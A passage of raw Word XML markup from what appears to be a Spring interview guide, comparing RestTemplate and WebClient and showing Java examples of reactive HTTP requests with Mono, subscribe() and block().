          </w:tcPr>
          <w:p w14:paraId="63FF31D5"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API Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5027B429"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erative (blocking calls)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E37656F"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active (non-blocking calls with Mono/Flux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B60C28C"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onclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A145092"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Use RestTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if you're working with traditional, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronous applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or if you are maintaining legacy code that already uses it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5863D777"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Use WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (especially </w:t>
      </w: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reactive systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) that need </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous</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non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP requests, or when you expect high concurrency and need a scalable solution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D94845"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632C97E">
          <v:rect id="_x0000_i2298" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB67B86" w14:textId="7FCB97BB"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08" w:name="_Toc196307988"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How would you use WebClient to perform a reactive HTTP request</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="508"/>
    </w:p>
    <w:p w14:paraId="793EE253" w14:textId="7C473240" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56"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o use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to perform a reactive HTTP request in a Spring WebFlux application, follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7D8CF9"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 Add Dependency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7796325A"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Ensure that the </w:t>
      </w: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xml:space="preserve"> dependency is added to your pom.xml (for Maven) or build.gradle (for Gradle):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58169750"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or Maven:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B7B233"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t;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233C3C13"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D96DF5"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artifactId&gt;spring-boot-starter-webflux&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285C2DAB"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t;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7350AE8B"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or Gradle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7944F7E3"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lementation 'org.springframework.boot:spring-boot-starter-webflux'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E6C728"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2. Create WebClient Bean:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617347EF"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You need to configure a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> bean to be used across your application. It can be done in the configuration class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9B8613"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xample:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F73501B"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context.annotation.Bean;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D50769"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context.annotation.Configuration;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2889F454"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web.reactive.function.client.WebClient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6F024C" w14:textId="77777777" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70B7F7E5"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Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAE07AC"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WebClientConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B693883"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2EA9CA10"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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B9A4CC"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WebClient.Builder webClientBuilder() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F40FE8"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WebClient.builder();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C132367"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45420461"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10AECE8A"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is will allow you to inject a WebClient.Builder into your components/services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D363AAF"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3. Inject WebClient:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4476080B"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n your service or component, inject </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and make the HTTP request reactively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1F57DF"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xample:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707B09F5"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stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B39F743"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web.reactive.function.client.WebClient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CF9789"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Mono;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF54692" w14:textId="77777777" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BA14D25"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ervice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361952E4"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MyService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048DD57D"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 xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5043DC06"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final WebClient webClient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565CB42F" w14:textId="77777777" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D795F64"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Injecting WebClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744D63E1"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yService(WebClient.Builder webClientBuilder) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FDA5CC"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his.webClient = webClientBuilder.baseUrl("https://jsonplaceholder.typicode.com").build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CE7513"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636E3E4E" w14:textId="77777777" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17591F77"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Perform a reactive HTTP GET request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5118C5A3"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String&gt; getPostData() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E62DAE7"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this.webClient.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71749DD7"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uri("/posts/1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D83DB7"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rieve()  // Initiates the request and retrieves the response body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC44BA6"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bodyToMono(String.class);  // Converts the response body to a Mono of String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28972C06"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4A809A73"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42B2176D"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4. Perform Reactive HTTP Request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45398EC8"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ebClient.get() initiates an HTTP GET request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2774DC"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ri("/posts/1") sets the endpoint you want to hit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BAEC79"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trieve() triggers the request and prepares for response retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0E9B8C"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bodyToMono(String.class) processes the response body as a Mono&lt;String&gt;, which is a reactive type. The body is processed asynchronously without blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51722F89"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5. Consume the Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24968745"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o get the response, you can use reactive operators like subscribe(), block(), or doOnTerminate(). For non-blocking operations, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subscribe()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is often used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD01624"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xample:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EE4621"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void fetchData() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A056523"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etPostData().subscribe(response -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C05C102"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ystem.out.println("Response: " + response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CA6D01"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07C47BD6"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17CF6443"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6. Return the Mono in the Controller (optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A461591"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You can use this service method in your controller and return the result directly as Mono or Flux to allow Spring WebFlux to handle the response asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB60A22"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xample:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAF8582"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web.bind.annotation.GetMapping;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A186D2"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web.bind.annotation.RestController;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABE01C7"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Mono;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265700D1" w14:textId="77777777" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72C71D60"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBEE8B4"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MyController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F232E8" w14:textId="77777777" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7797CF3C"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final MyService myService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F632A7" w14:textId="77777777" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2101DBE7"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yController(MyService myService) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5DFF56"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his.myService = myService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34197EF4"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51282205" w14:textId="77777777" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BADE952"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etMapping("/post")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DC978D"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String&gt; getPost() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAECEDF"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myService.getPostData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634301E6"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1CACB9EF"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2965D673"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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E0BE56"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WebClient.get()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Initiates a GET HTTP request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F2CACD"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uri("/posts/1")</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the endpoint to query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775AE0FA"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lastRenderedPageBreak/>
        <w:t>retrieve()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Performs the request and prepares for response handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7475D419"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bodyToMono(String.class)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Converts the response body to a Mono&lt;String&gt;, which represents a single, asynchronous value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6756B7E5"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Asynchronous Nature:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D9ACEE"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he Mono returned by </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> type. The call is non-blocking, meaning the thread isn't held up while waiting for the response. Instead, it will be processed asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCBC6AE"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You can chain additional operators like map(), flatMap(), doOnSuccess(), onErrorResume(), etc., to handle the data or any errors during the HTTP request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D91DF18" w14:textId="77777777" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D5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Important:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60288C69"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Blocking call</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you use .block() (not recommended in reactive code), it will block the current thread until the response is returned, negating the non-blocking advantage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9F792E" w14:textId="77777777" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D5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tring result = getPostData().block(); // Blocking call (use with caution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8938C9" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00163F3B">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568B18E">
          <v:rect id="_x0000_i2299" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DC5999" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00CE4B95" w:rsidRDefault="004A4102" w:rsidP="004A4102">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="509" w:name="_Toc196307989"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of block() and subscribe() in Spring reactive?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="509"/>
    </w:p>
    <w:p w14:paraId="131BCA93" w14:textId="3F9B58B6" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A4102"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n </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Reactive (WebFlux)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, methods like .block() and .subscribe() are used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>interact with Mono and Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which are the core reactive types. Here's a clear breakdown:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3731C9" w14:textId="77777777" w:rsidR="004A4102"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D951B40">
          <v:rect id="_x0000_i2300" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7DB154" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A4102"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subscribe() – Triggers the reactive pipeline (asynchronously)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D08BE07" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A410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t </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>starts the execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the reactive stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336EFC91" w14:textId="77777777" w:rsidR="004A4102" w:rsidRPr="00B13F85" w:rsidRDefault="004A410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t's </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
